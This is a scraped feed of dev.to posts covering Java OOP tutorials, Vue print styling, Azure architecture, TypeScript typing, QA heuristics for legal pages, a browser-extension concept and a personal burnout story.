By setting margins on the printed page we can hide its default header and footer; the value that worked for me is `margin: 0.15in 0.3in 0.15in 0.3in`.
## Print exact colors in the page
`print-color-adjust: exact; -webkit-print-color-adjust: exact;` Ensures that colors are printed exactly as they appear on the screen, maintaining the intended design.
## Conclusion
In this article, we've covered how to handle printing in your Vue.js application by defining print-specific styles and ensuring components are print-friendly. This approach, applicable to other frameworks as well, helps create a seamless print experience. Key elements include setting appropriate print styles, managing page breaks, and ensuring color accuracy. For a complete working sample and detailed implementation, check out the [GitHub repository](https://github.com/Joseph42A/Printing-with-VueJS). Thank you for reading!
| joseph42a |
1,878,474 | Thinking in Objects | The procedural paradigm focuses on designing methods. The object-oriented paradigm couples data and... | 0 | 2024-06-05T20:55:27 | https://dev.to/paulike/thinking-in-objects-44nb | java, programming, learning, beginners | The procedural paradigm focuses on designing methods. The object-oriented
paradigm couples data and methods together into objects. Software design using the object-oriented paradigm focuses on objects and operations on objects. Classes provide more flexibility and modularity for building reusable software. This section improves the solution for a problem introduced in previous post using the object-oriented approach. From these improvements, you will gain insight into the differences between procedural and object-oriented programming and see the benefits of developing reusable code using objects and classes.
ComputeAndInterpretBMI.java, presented [here](https://dev.to/paulike/case-study-computing-body-mass-index-and-computing-taxes-4jck), is a program for computing body mass index. Its code cannot be reused in other programs because it lives in the **main** method. To make it reusable, define a static method to compute body mass index as follows:
`public static double getBMI(double weight, double height)`
This method is useful for computing body mass index for a specified weight and height. However, it has limitations. Suppose you need to associate the weight and height with a person’s name and birth date. You could declare separate variables to store these values, but these values would not be tightly coupled. The ideal way to couple them is to create an object that contains them all. Since these values are tied to individual objects, they should be stored in instance data fields. You can define a class named **BMI** as shown in Figure below.

Assume that the **BMI** class is available. The program below gives a test program that uses this class.

Line 6 creates the object **bmi1** for **Kim Yang** and line 9 creates the object **bmi2** for **Susan King**. You can use the instance methods **getName()**, **getBMI()**, and **getStatus()** to return the BMI information in a **BMI** object.
The **BMI** class can be implemented as in below.
```
package demo;
public class BMI {
private String name;
private int age;
private double weight; // in pounds
private double height; // in inches
public static final double KILOGRAMS_PER_POUND = 0.45359237;
public static final double METERS_PER_INCH = 0.0254;
public BMI(String name, int age, double weight, double height) {
this.name = name;
this.age = age;
this.weight = weight;
this.height = height;
}
public BMI(String name, double weight, double height) {
this(name, 20, weight, height);
}
public double getBMI() {
double bmi = weight * KILOGRAMS_PER_POUND / ((height * METERS_PER_INCH) * (height * METERS_PER_INCH));
return Math.round(bmi * 100) / 100.0; // divide by 100.0, not 100: integer division would drop the decimals
}
public String getStatus() {
double bmi = getBMI();
if(bmi < 18.5)
return "Underweight";
else if(bmi < 25)
return "Normal";
else if(bmi < 30)
return "Overweight";
else
return "Obese";
}
public String getName() {
return name;
}
public int getAge() {
return age;
}
public double getWeight() {
return weight;
}
public double getHeight() {
return height;
}
}
```
The mathematical formula for computing the BMI from weight and height is given in the post linked above. The instance method **getBMI()** returns the BMI. Since the weight and height are instance data fields in the object, the **getBMI()** method can use these properties to compute the BMI for the object.
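For reference, the conversion that `getBMI()` performs (pounds to kilograms and inches to meters) works out to:

```
BMI = (weight × 0.45359237) / (height × 0.0254)²
```

with weight in pounds and height in inches, giving a result in kilograms per square meter.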
The instance method **getStatus()** returns a string that interprets the BMI. The interpretation is also given in the linked post.
This example demonstrates the advantages of the object-oriented paradigm over the procedural paradigm. The procedural paradigm focuses on designing methods. The object-oriented paradigm couples data and methods together into objects. Software design using the object-oriented paradigm focuses on objects and operations on objects. The object-oriented approach combines the power of the procedural paradigm with an added dimension that integrates data with operations into objects.
In procedural programming, data and operations on the data are separate, and this methodology requires passing data to methods. Object-oriented programming places data and the operations that pertain to them in an object. This approach solves many of the problems inherent in procedural programming. The object-oriented programming approach organizes programs in a way that mirrors the real world, in which all objects are associated with both attributes and activities. Using objects improves software reusability and makes programs easier to develop and easier to maintain. Programming in Java involves thinking in terms of objects; a Java program can be viewed as a collection of cooperating objects. | paulike |
1,878,472 | Unlocking the Potential of Free Shipping APIs | In the fast-paced world of eCommerce, efficient shipping solutions can make or break a business. As... | 0 | 2024-06-05T20:53:03 | https://dev.to/ericksmith14/unlocking-the-potential-of-free-shipping-apis-5f0m | api, shipping | In the fast-paced world of eCommerce, efficient shipping solutions can make or break a business. As online retailers strive to meet customer demands for fast, reliable delivery, the role of shipping APIs becomes increasingly crucial. Among the myriad options available, Free Shipping APIs stand out as a cost-effective solution. But are they truly worth the investment? Let's delve into the world of Free Shipping APIs to uncover their potential benefits and limitations.
## Understanding Free Shipping APIs
[Free Shipping APIs](https://shippingdataapi.com/), also known as Free Carrier APIs, are application programming interfaces that facilitate seamless communication between eCommerce platforms and shipping carriers. These APIs empower merchants to automate various aspects of the shipping process, from generating shipping labels to calculating shipping rates and tracking shipments in real-time. By integrating with a Free Shipping API, businesses can streamline their logistics operations, enhance customer satisfaction, and ultimately drive revenue growth.
## The Value Proposition of Free Shipping APIs
One of the most compelling advantages of Free Shipping APIs is their cost-effectiveness. Unlike traditional shipping APIs that may incur hefty subscription fees or transactional charges, Free Shipping APIs offer merchants access to essential shipping functionalities at no additional cost. This affordability makes them particularly appealing to small and medium-sized businesses operating on tight budgets.
Moreover, Free Shipping APIs democratize access to cutting-edge shipping technologies, enabling businesses of all sizes to compete on a level playing field. By harnessing the power of these APIs, merchants can offer competitive [shipping rates](https://dev.to/ericksmith14/how-to-integrate-a-shipping-api-a-step-by-step-guide-for-developers-4e7g), expedited delivery options, and superior shipment tracking capabilities, thus enhancing the overall customer experience and fostering brand loyalty.
## Maximizing Efficiency with Free Shipping APIs
Beyond cost savings, Free Shipping APIs empower merchants to automate and optimize their shipping workflows. Through seamless integration with eCommerce platforms and shipping carriers, these APIs facilitate swift order fulfillment, accurate shipment tracking, and efficient inventory management. By eliminating manual tasks and reducing human error, businesses can streamline their operations, minimize shipping delays, and improve productivity.
Furthermore, Free Shipping APIs enable merchants to gain valuable insights into their shipping performance and customer behavior. By analyzing shipping data and tracking metrics such as delivery times, shipping costs, and customer satisfaction ratings, businesses can identify areas for improvement, refine their shipping strategies, and drive operational efficiencies.
## Navigating the Limitations
While Free Shipping APIs offer numerous benefits, it's essential to acknowledge their limitations. Compared to premium shipping APIs, Free Shipping APIs may have fewer features or limitations in terms of carrier options, shipping destinations, or customization capabilities. Additionally, reliance on a single Free Shipping API provider could introduce dependency risks, as changes to the API or service interruptions may impact business operations.
## Conclusion: Embracing the Power of Free Shipping APIs
In conclusion, Free [Shipping APIs](https://shippingdataapi.com/) present a compelling value proposition for eCommerce businesses seeking to optimize their shipping operations and enhance customer satisfaction. By offering essential shipping functionalities at no cost, these APIs enable merchants to drive cost savings, streamline logistics workflows, and gain a competitive edge in the marketplace. While they may have limitations compared to premium alternatives, Free Shipping APIs remain a valuable tool for businesses of all sizes looking to unlock the full potential of their shipping capabilities. As the eCommerce landscape continues to evolve, embracing the power of Free Shipping APIs can propel businesses towards success in the digital age. | ericksmith14 |
1,876,905 | What I learned after burnout | For a period during the pandemic, the company I worked for experienced explosive growth, and with... | 0 | 2024-06-05T20:52:39 | https://dev.to/leonardoventurini/what-i-learned-after-burnout-105n | burnout, webdev, productivity, healthydebate | For a period during the pandemic, the company I worked for experienced explosive growth, and with that my responsibilities grew as I took a leadership position, and the issues related to that growth piled up: more clients, bigger clients, different requirements and all that.
Everything was going smoothly for the first months, but then it all started to derail. I started eating badly and drank more and more caffeine, until I was at a point where paranoia started to set in. I would doubt the intentions behind what people were telling me; I would suddenly start eyeing my webcam suspiciously, suspecting people were even monitoring me. I was severely afraid of being fired, even though I was one of the top performers and among the most respected.
Something was not right with me. At one point a truck cut off the optical fiber of my internet provider and I suddenly could not work, I was not just terrified, I freaked out. I was afraid of everything, I hated myself.
Eventually I could not stand it anymore, and I asked for help, half prepared to get fired... turned out that everything was just in my own head, people were actually way kinder than I expected. I got a vacation and some time to recover from the brunt of it. In truth I would spend the following 2 years to truly recover.
Something was awry, and I couldn't figure out why. I didn't even know where to look. I paid for expensive exams that would tell me nothing. I consulted to all kinds of doctors, some would prescribe me strange drugs which would only make things worse.
I took antidepressants for a few months, but it made my life unbearable, I could not think straight, I would be forgetful. I felt dumb. If I continued with it my worst fears would materialize, I would have to abandon programming completely, and perhaps become poor again or so I told myself.
Eventually, after I had given up, my wife convinced me to do one last battery of exams, which didn't reveal anything new, but the doctor said something different, a clue that triggered a larger process of healing.
My thyroid antibodies were sky high, I knew that and I was on medication for that. But he said that very likely it was caused by some food I was eating, a protein which my body was attacking by producing those same antibodies, and it could be gluten, among a few others he mentioned.
Then it dawned on me. A few years before then I lost a huge amount of weight (23kg), but I didn't fully know why, I was biking 15km every day for work, yes, but I was eating a lot too. It was wheat. I had stopped eating wheat.
I remove it and boom, I lose 4kg in 2 weeks and begin to feel my energy come back to me. After about 3 months I am back at my original weight before the pandemic (minus 15 kg). But I didn't stop there. I could not.
I realized that I was still very grumpy and tired, especially in the afternoons and at night. What if it is something I am eating, or rather, drinking? Turns out I was already recommended to stop drinking caffeine due to some medications I was taking, but didn't follow through, now I did.
In the beginning, for about a month, it was a nightmare, I was so sleepy and couldn't think well. But then I started to feel better and better, eventually I noticed that I could do the same amount of work I did before, but I would stay rested until the night. I started to smile more, and be interested in people more.
And all along I thought I was just antisocial. No! I was stressed, tired and unhealthy, but I wasn't antisocial at all.
I still had my normal headaches from computer use though, which still prevented me from doing the things I wanted to do. Eventually, I noticed some guy using yellow tinted glasses, that was different I thought. Then I realized, what if my eyes are overstimulated?
I did use some glasses with blue light treatment, perhaps those were too weak. I started calling stores, and I ordered this custom "night drive" glasses, and turns out I have never worked with as much comfort in my life. My headache vanishes.
With that my job, projects and relationships start flourishing again. I am not afraid of the future anymore. Things look brighter than ever.
These realizations took me almost 30 years. I wish I knew that sooner, way sooner. How much farther would I be?
From these we can conclude some things:
1. Never do something because other people do it or tell you to, what is good for them might not be for you, perhaps not even to them and they don't know better. If it is socially cool, ask yourself ten times if you should do it. And remember, no one has your best interests in mind, they might want to but they still might be wrong. Take the responsibility.
2. The unseen world has so much power over the seen world, who would've thought that a small protein from a food that I've eaten every day and seen everyone eat, could be insidiously doing so much harm to me (like smoking the doctor said).
3. We need to be like scientists and observe what we do right or wrong. It's our responsibility to experiment and improve our own lives; never be satisfied with the status quo, especially if you are in a bad situation.
How many people are going through bad stuff blindly out there? A lot! I hope my words, my experience brings some light to them. Everything can change in the blink of an eye, you only have to believe and have the courage to experiment.
In the beginning it was awful to not be able to eat 90% of the food I saw in the market or in the restaurants. But eventually it became easier and easier. I would never trade how I feel today for anything, certainly not food.
We are like computers in one sense, our inputs directly impact our outputs. Eat well, study well and you will have extraordinary results.
If you enjoyed my story, please check my project, [Metaboard](https://metaboard.cc), it's the next step in my personal growth. It not only helps me directly as a powerful visual second brain, but it is helping me develop my business and product skills. | leonardoventurini |
1,878,470 | CORE AZURE ARCHITECTURE COMPONENTS. | Below are the core Azure Architecture components for Azure cloud Computing.Basically Azure... | 0 | 2024-06-05T20:52:16 | https://dev.to/phillip_ajifowobaje_68724/core-azure-architecture-components-32go | Below are the core Azure Architecture components for Azure cloud Computing.Basically Azure architecture focus on the physical infrastructure, how resources are managed, and have a chance to create an Azure resource.
- Azure's architecture ensures high availability, scalability, and efficient resource management
- Core Azure architectural components include Azure regions, Azure Availability Zones, resource groups, and the Azure Resource Manager.
- A deeper dive into Azure Resource Manager, Availability Zones, regions, resource groups, and other Azure architectural components.
A. **AZURE REGION**:
An Azure region is a set of datacenters geographically spread across different parts of the globe. Currently there are 42 regions scattered around the world, with plans to grow into more. These datacenters are deployed within a latency-defined perimeter. An Azure region refers to an area within a geography that contains one or more Azure datacenters.
B.**AZURE AVAILABILITY ZONES**:
Azure Availability Zones are physically separate datacenters within an Azure region, used for failover and backup. There are multiple Availability Zones in a given Azure region. Each Availability Zone is a unique physical location within the region, supported by one or more datacenters equipped with their own independent power, cooling, and networking infrastructure. Applications and data are protected in each Availability Zone because the zones are physically separated from one another and secured; this helps achieve data resiliency.
C. **RESOURCE GROUPS IN AZURE**:
These are logical containers that hold Azure resources belonging to a larger Azure solution. A resource group can host all the resources that comprise an overall solution, or just the resources that need to be managed as a group. The administrator decides, based on need, how to allocate resources to resource groups within Azure.

Since all resources within a single resource group usually share a similar lifecycle, it's important to determine the lifecycle of the resources you plan to place together. For example, a web app and its dedicated database server can live in one resource group; however, if the database server hosts databases for other applications, its lifecycle is likely different from the web app's, and it might belong in a different resource group with resources that share its lifecycle. Resources can be moved between resource groups if necessary, and a resource group can contain resources from different regions. Resource groups are also often used to manage access control and to better organize billing and resource management.
D. **AZURE RESOURCE MANAGER**:
Azure Resource Manager is the deployment and management service for Azure. It provides a management layer that enables you to create, update, and delete resources in your Azure account. You use management features such as locks and tags to secure, organize, and effectively bill your resources after deployment. You can also use Resource Manager to apply access controls to resources within a resource group, because Role-Based Access Control (RBAC) is natively integrated into the Azure platform.

**SUMMARY**:
Core Azure architectural components such as regions, resource groups, and Availability Zones serve as the underlying building blocks for any Azure solution that gets deployed.
Azure Resource Manager is used to manage these building blocks and the solutions that are built upon them.
While Azure regions dictate where Azure resources are deployed, Availability Zones are used to provide redundancy for those resources that are deployed. Resource groups are used to group and manage related Azure resources that have been deployed to support an overall solution.
| phillip_ajifowobaje_68724 | |
1,878,471 | My Programming Journey | Hi😍 I am excited to share my first post here. I am writing to document my first experience as I ... | 0 | 2024-06-05T20:49:50 | https://dev.to/nessgood6071/my-programming-journey-becoming-a-techie-3pnl | Hi😍 I am excited to share my first post here. I am writing to document my first experience as I become a techie.
Web development has always been an area of great interest to young tech beginners. It involves the design and creation of websites and webpages, using languages such as HTML, CSS, and JavaScript. It cuts across various disciplines such as web design, web programming, and database management. From simple static web pages to complex dynamic web applications, web development covers a broad spectrum of activities aimed at creating engaging and functional online experiences.
My Programming journey has been impactful in this early stage and I know it would be an amazing experience because I am beginning my tech journey as a starter in the right Tech Firm, thanks to White Creativity for acceptance.
Technical skills are in high demand in society today, and here I am to get one for myself. Since the beginning of my learning as an intern web developer, I would say this has been my best phase of learning with respect to my course of study. I do not just hear what it's like; I have been given the chance to learn, test, and practice the theory I have been taught.
I chose web development as a specialty for starter and it has been amazing creating those lovely web pages and designs, it's really amazing. I started few days ago and I'm glad to have just completed my First HTML and CSS coding Class with the examples attached to it and it was really awesome. I am enthusiastic about classes ahead and practicing higher examples which would equip me to easily solve real life problems. I believe this team through their unique way of teaching and impacting would help me advance and have more reason to love web development.
I do not have much technical exposure on this article because I'm a starter but I hope to have more write-ups on hands-on labs, experiences and exercises as I journey on this path and I trust White Creativity would be a catalyst for me to have more reasons to venture into other tech skills.
I am glad I joined the best team and ready to learn, practice and Explore with #WhiteCreativity.
By Onyechere, Goodness Chimuanya
5th June,2024. | nessgood6071 | |
1,878,409 | Heuristics for identifying legal (documentation) risks as a QA | [This article is not a substitute for professional legal advice. This article does not create an... | 0 | 2024-06-05T20:46:55 | https://dev.to/ashleygraf_/heuristics-for-identifying-legal-documentation-risks-as-a-qa-dl7 | testing | [This article is not a substitute for professional legal advice. This article does not create an attorney-client relationship, nor is it a solicitation to offer legal advice.]
Companies generally have to follow certain requirements for legal documentation. These are that legal documentation such as Terms and Conditions and the Privacy Policy, amongst other documents, must be
- PRESENT
- UP-TO-DATE
- NOT SKIPPABLE
- EASY TO LOCATE AND ACCESS
So if they are BOHMN (Bypassable, Outdated, Hidden, Missing, or Not agreed to), you might have an issue.
## BYPASS
Find paths that allow users to BYPASS/SKIP the terms and conditions or the privacy policy page (or other relevant documentation; check with your company's lawyer/legal team) when signing up for the product, signing into the platform, or buying a new service.
## OUTDATED
Find links to OUTDATED legal copy documents.
Is the copy on the page - if it's directly on the screen - up-to-date?
Do the links to the documentation page or document go to the correct one?
Is the outdated legal documentation still viewable if/when it's not supposed to be?
When all the legal links/documents/copy were updated on the website, were they really ALL updated? Does it match the rest of the links (if it is supposed to match)?
## HIDDEN
Find HIDDEN (links to) legal copy.
A link might be hidden if it blends in with the background colour of the page.
It might also be hidden if it's not accessible from every screen.
## MISSING
Find MISSING (links to) legal copy.
A page might be missing references to the relevant legal copy for that page.
A citation might be incorrect.
The footer might be missing references to the legal pages.
## NOT AGREE
Find paths that allow users to NOT AGREE to the terms and conditions or the privacy policy (for example) when signing up for the product, or signing into the platform, or buying a new service.
If the site is using checkboxes, is it possible to go to the next screen without ticking the relevant checkbox?
If the site is saying, "if you click accept, you accept these terms", can you go to the next screen without accepting? Or maybe if you go backward and forward you can remove the acceptance and continue on?
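The MISSING heuristic can even be partially automated. Below is a minimal sketch; the required document names and the helper function are hypothetical, and the real list of required documents should come from your company's legal team:

```javascript
// Documents every page footer is expected to link to (hypothetical list).
const REQUIRED_LEGAL_DOCS = ['terms', 'privacy'];

// Given the hrefs collected from a page footer, return the required legal
// documents that have no matching link.
function missingLegalLinks(footerHrefs) {
  const lower = footerHrefs.map((href) => href.toLowerCase());
  return REQUIRED_LEGAL_DOCS.filter(
    (doc) => !lower.some((href) => href.includes(doc))
  );
}
```

A check like this can run against every screen of the flow, which also helps catch the EASY TO LOCATE AND ACCESS requirement.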
| ashleygraf_ |
1,878,469 | How-to: Use dictionary in TypeScript | Here is the scenario, I want to create a function getLegsNumber that use this structure as... | 0 | 2024-06-05T20:42:11 | https://dev.to/linediconsine/a-dictionary-in-typescript-31ek | typescript, javascript, webdev | Here is the scenario: I want to create a function `getLegsNumber` that uses this structure as a dictionary
```Javascript
const mappingAnimalLegs = {
'CAT' : 4,
'DOG' : 4,
'DUCK' : 2
}
```
If I write something like this
```Javascript
function getLegsNumber(animal) {
return mappingAnimalLegs[animal] | 0
}
```
TypeScript is not happy and tells us:

```
Element implicitly has an 'any' type because expression of type 'any' can't be used to index type '{ CAT: number; DOG: number; DUCK: number; }'.(7053)
```
So... how can I solve this without adding too much noise?
Here is my solution:
```Javascript
function getLegsNumber(animal: string): number {
if (animal in mappingAnimalLegs) {
return mappingAnimalLegs[animal as keyof typeof mappingAnimalLegs];
}
return 0
}
```
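For a quick sanity check, here is the same solution as a self-contained snippet with example calls; a known animal returns its mapped value, and an unknown one falls back to 0:

```typescript
const mappingAnimalLegs = {
  CAT: 4,
  DOG: 4,
  DUCK: 2,
};

function getLegsNumber(animal: string): number {
  if (animal in mappingAnimalLegs) {
    return mappingAnimalLegs[animal as keyof typeof mappingAnimalLegs];
  }
  return 0;
}

console.log(getLegsNumber('CAT')); // 4
console.log(getLegsNumber('SNAKE')); // 0
```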
I can also simplify a bit more with
```Javascript
function getLegsNumber(animal: string): number {
return mappingAnimalLegs[animal as keyof typeof mappingAnimalLegs] | 0
}
```
What do you think?
[Typescript playground as reference](https://www.typescriptlang.org/play/?#code/MYewdgzgLgBAtgQwA5IJZgOYEEysQGwBkBTDCGAXhgG8AoGBmAcgGEsAVJmALhgBYANPUZMAIgHkA4l16DhDMQFUWAaRkwATLQC+tWgDMArmGBRU4GBmJQSZAHII4AI2IAnABQJcBXtFfoMAEpeMENnNxp5GFdrQ1cweGQ0TBw8BCJSCABtLzT8GARyAGtiAE8QfRgoUqRiCsSUANSCWwgAXRgAHxgABh0gA) | linediconsine |
1,878,466 | [WIP] Test UI? | There are different solutions on test UI Jest unit testing Jest Snapshots Integration... | 0 | 2024-06-05T20:31:14 | https://dev.to/linediconsine/wip-test-ui-dl4 | webdev, javascript, programming | There are different solutions for testing UI
- Jest unit testing
- Jest Snapshots
- Integration testing
- Image comparison testing
- Accessibility reports
- Manual testing
When to us what? In my experience a big project will end up using all of them.
Let's start with the first.
## Jest unit testing
> Unit testing is a type of software testing that focuses on individual units or components of a software system.
Nice... but let's also mention that:
> we want to test behavior and not implementation
The goal is that I can change 100% of the implementation and the tests will still pass.
How? This style is called "black-box testing", and it focuses on behavior rather than on testing each function's inputs and outputs.
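As a concrete sketch of the black-box style (`formatPrice` here is a made-up unit under test), the assertions only touch inputs and outputs:

```javascript
// A hypothetical unit under test.
function formatPrice(cents) {
  return `$${(cents / 100).toFixed(2)}`;
}

// Behavior-focused assertions: if formatPrice is later rewritten
// (say, with Intl.NumberFormat), these still pass unchanged.
console.assert(formatPrice(199) === '$1.99');
console.assert(formatPrice(0) === '$0.00');
```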
## Jest Snapshots
As the official docs tell
> Snapshot tests are a very useful tool whenever you want to make sure your UI does not change unexpectedly
The idea is: I take a copy of the rendered component (only the generated HTML) in a scenario X, and I compare against it each time I run the test. If it's different... well, we know something has changed.
... to be continued
| linediconsine |
1,878,465 | Millisecond Scale-to-Zero with Unikernels | A solution to intermittent and unpredictable traffic. | 0 | 2024-06-05T20:24:03 | https://dev.to/plutov/millisecond-scale-to-zero-with-unikernels-5bjl | unikraft, unikernels, cloud | ---
title: Millisecond Scale-to-Zero with Unikernels
published: true
description: A solution to intermittent and unpredictable traffic.
tags: Unikraft, unikernels, cloud
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gr62ywypmo19s8s0dzbm.png
---
[Read the full article here](https://packagemain.tech/p/millisecond-scale-to-zero-with-unikernels)
| plutov |
1,877,154 | Transforming Internet Browsing Experience on Desktop: A Proof of Concept | Over time, desktop internet browsing can become clumsy due to the accumulation of numerous open tabs.... | 0 | 2024-06-05T20:23:56 | https://dev.to/maleta/transforming-desktop-browsing-experience-a-proof-of-concept-417 | ux, webbrowser | Over time, desktop internet browsing can become clumsy due to the accumulation of numerous open tabs. You may become attached to tabs you've opened or you forget to close them, and you end up carrying them over to each new browsing session. This issue has been recognized in recent years, and some solutions have been developed to enhance the browsing experience.
The most valuable solution for me was the introduction of [tab grouping in Chrome](https://blog.google/products/chrome/manage-tabs-with-google-chrome/). It helped keep my tabs organized. Before this, there were similar tools to tackle this problem, such as Session Buddy, a Chrome extension that allows you to store and manage sessions effortlessly.
However, both solutions share a common drawback: web browsing now requires time for tab management. While the time involved isn't substantial, it disrupts the browsing flow, requiring a cleanup after each session or tidying open tabs while browsing, and that is not fun.
After my last browsing session cleanup, I reflected on how having so many tabs open had become normal. I realized that the web browsing experience hasn't fundamentally changed since [the introduction of tabs](https://en.wikipedia.org/wiki/NetCaptor). When opening a link, you either **replace the current page** or **open in a new tab**.
**What if** there was a way to open a link in the same position as the link itself, without replacing the current page?
This approach should lead to fewer open tabs per session and provide a smoother browsing experience, as your eyes wouldn't need to readjust to a new position.
To test this browsing experience, I built a simple Chrome extension ([source](https://github.com/maleta/link-in-same-page)).
Here's a preview of how it works:

The extension works partially due to [multiple security concerns](https://github.com/maleta/link-in-same-page?tab=readme-ov-file#security-concerns) and the fact that it utilizes the `iframe` HTML element. If this browsing experience is properly integrated, users should have an isolated and safe browsing experience.
Feel free to share your thoughts or suggestions.
| maleta |
1,878,464 | Class Abstraction and Encapsulation | Class abstraction is the separation of class implementation from the use of a class. The details of... | 0 | 2024-06-05T20:22:49 | https://dev.to/paulike/class-abstraction-and-encapsulation-2flo | java, programming, learning, beginners | Class abstraction is the separation of class implementation from the use of a class. The details of implementation are encapsulated and hidden from the user. This is known as class encapsulation. Java provides many levels of abstraction, and _class abstraction_ separates class implementation from how the class is used. The creator of a class describes the functions of the class and lets the user know how the class can be used. The collection of methods and fields that are accessible from outside the class, together with the description of how these members are expected to behave, serves as the _class’s contract_. As shown in Figure below, the user of the class does not need to know how the class is implemented.

The details of implementation are encapsulated and hidden from the user. This is called _class encapsulation_. For example, you can create a **Circle** object and find the area of the circle without knowing how the area is computed. For this reason, a class is also known as an _abstract data type_ (ADT).
Class abstraction and encapsulation are two sides of the same coin. Many real-life examples illustrate the concept of class abstraction. Consider, for instance, building a computer system. Your personal computer has many components—a CPU, memory, disk, motherboard, fan, and so on. Each component can be viewed as an object that has properties and methods. To get the components to work together, you need to know only how each component is used and how it interacts with the others. You don’t need to know how the components work internally. The internal implementation is encapsulated and hidden from you. You can build a computer without knowing how a component is implemented.
The computer-system analogy precisely mirrors the object-oriented approach. Each component can be viewed as an object of the class for the component. For example, you might have a class that models all kinds of fans for use in a computer, with properties such as fan size and speed and methods such as start and stop. A specific fan is an instance of this class with specific property values.
As another example, consider getting a loan. A specific loan can be viewed as an object of a **Loan** class. The interest rate, loan amount, and loan period are its data properties, and computing the monthly payment and total payment are its methods. When you buy a car, a loan object is created by instantiating the class with your loan interest rate, loan amount, and loan period. You can then use the methods to find the monthly payment and total payment of your loan. As a user of the **Loan** class, you don’t need to know how these methods are implemented.
ComputeLoan.java, presented [here](https://dev.to/paulike/software-development-process-1lb9), is a program for computing loan payments. That program cannot be reused in other programs because the code for computing the payments is in the **main** method. One way to fix this problem is to define static methods for computing the monthly payment and total payment. However, this solution has limitations. Suppose you wish to associate a date with the loan. There is no good way to tie a date with a loan without using objects. The traditional procedural programming paradigm is action-driven, and data are separated from actions. The object-oriented programming paradigm focuses on objects, and actions are defined along with the data in objects. To tie a date with a loan, you can define a loan class with a date along with the loan’s other properties as data fields. A loan object now contains data and actions for manipulating and processing data, and the loan data and actions are integrated in one object. The figure below shows the UML class diagram for the **Loan** class.

The UML diagram in Figure above serves as the contract for the **Loan** class. Throughout this book, you will play the roles of both class user and class developer. Remember that a class user can use the class without knowing how the class is implemented. Assume that the **Loan** class is available. The program below uses that class.

```
Enter annual interest rate, for example, 8.25: 2.5
Enter number of years as an integer: 5
Enter loan amount, for example, 120000.95: 1000
The loan was created on Sat Jun 16 21:12:50 EDT 2012
The monthly payment is 17.75
The total payment is 1064.84
```
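The numbers in the sample run can be verified directly against the payment formula the **Loan** class uses; here is a minimal standalone check (not part of the book's code, just the formula extracted for illustration):

```java
public class LoanCheck {
    public static void main(String[] args) {
        double annualInterestRate = 2.5; // percent, as entered in the sample run
        int numberOfYears = 5;
        double loanAmount = 1000;

        // Same formula as Loan.getMonthlyPayment(): divide by 1200 to get
        // the monthly rate as a fraction, and pay over years * 12 months.
        double monthlyInterestRate = annualInterestRate / 1200;
        double monthlyPayment = loanAmount * monthlyInterestRate
            / (1 - (1 / Math.pow(1 + monthlyInterestRate, numberOfYears * 12)));
        double totalPayment = monthlyPayment * numberOfYears * 12;

        System.out.printf("The monthly payment is %.2f%n", monthlyPayment); // 17.75
        System.out.printf("The total payment is %.2f%n", totalPayment);     // 1064.84
    }
}
```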
The **main** method reads the interest rate, the payment period (in years), and the loan amount; creates a **Loan** object; and then obtains the monthly payment and the total payment using the instance methods in the **Loan** class. The **Loan** class can be implemented as shown below.
```
package demo;
public class Loan {
private double annualInterestRate;
private int numberOfYears;
private double loanAmount;
private java.util.Date loanDate;
/** Default constructor */
public Loan() {
this(2.5, 1, 1000);
}
/** Construct a loan with specified annual interest rate, number of years, and loan amount */
public Loan(double annualInterestRate, int numberOfYears, double loanAmount) {
this.annualInterestRate = annualInterestRate;
this.numberOfYears = numberOfYears;
this.loanAmount = loanAmount;
loanDate = new java.util.Date();
}
/** Returns annualInterestRate */
public double getAnnualInterestRate() {
return annualInterestRate;
}
/** Set a new annualInterestRate */
public void setAnnualInterestRate(double annualInterestRate) {
this.annualInterestRate = annualInterestRate;
}
/** Return numberOfYears */
public int getNumberOfYears() {
return numberOfYears;
}
/** Set a new numberOfYears */
public void setNumberOfYears(int numberOfYears) {
this.numberOfYears = numberOfYears;
}
/** Return loanAmount */
public double getLoanAmount() {
return loanAmount;
}
/** Set a new loanAmount */
public void setLoanAmount(double loanAmount) {
this.loanAmount = loanAmount;
}
/** Return loanDate */
public java.util.Date getLoanDate() {
return loanDate;
}
/** Find monthly payment */
public double getMonthlyPayment() {
double monthlyInterestRate = annualInterestRate / 1200;
double monthlyPayment = loanAmount * monthlyInterestRate / (1 - (1 / Math.pow(1 + monthlyInterestRate, numberOfYears * 12)));
return monthlyPayment;
}
/** Find total payment */
public double getTotalPayment() {
double totalPayment = getMonthlyPayment() * numberOfYears * 12;
return totalPayment;
}
}
```
From a class developer’s perspective, a class is designed for use by many different customers. In order to be useful in a wide range of applications, a class should provide a variety of ways for customization through constructors, properties, and methods.
The **Loan** class contains two constructors, four getter methods, three setter methods, and the methods for finding the monthly payment and the total payment. You can construct a **Loan** object by using the no-arg constructor or the constructor with three parameters: annual interest rate, number of years, and loan amount. When a loan object is created, its date is stored in the **loanDate** field. The **getLoanDate** method returns the date. The methods—**getAnnualInterestRate**, **getNumberOfYears**, and **getLoanAmount**—return the annual interest rate, payment years, and loan amount, respectively. All the data properties and methods in this class are tied to a specific instance of the **Loan** class. Therefore, they are instance variables and methods.
Use the UML diagram for the **Loan** class to write a test program that uses the **Loan** class even though you don’t know how the **Loan** class is implemented. This has three benefits:
- It demonstrates that developing a class and using a class are two separate tasks.
- It enables you to skip the complex implementation of certain classes without interrupting the sequence of this book.
- It is easier to learn how to implement a class if you are already familiar with it from using it.
For all the class examples from now on, create an object from the class and try using its methods before turning your attention to its implementation. | paulike |
1,878,072 | Implementing UI Automation Testing for Desktop Applications Dealing With Different DBMS | This article can be useful for: Those who participate in UI automation testing of desktop... | 0 | 2024-06-05T20:22:39 | https://dev.to/konstantin_semenenkov/implementing-ui-automation-testing-for-desktop-applications-dealing-with-different-dbms-1fkg | testing, database, sql, dotnet | ## This article can be useful for:
- Those who participate in UI automation testing of desktop apps. Perhaps someone will be interested in the real experience of building a testing system.
- Someone who is making software that needs to use different relational database management systems (DBMSs).
## A brief history of the topic
Just a few words about the [project](https://ksdbmerge.tools/) discussed here. This section does not contain any technical details, so it can be skipped if you're in a hurry. The only technical information in this section is the list of DBMSs related to our discussion.
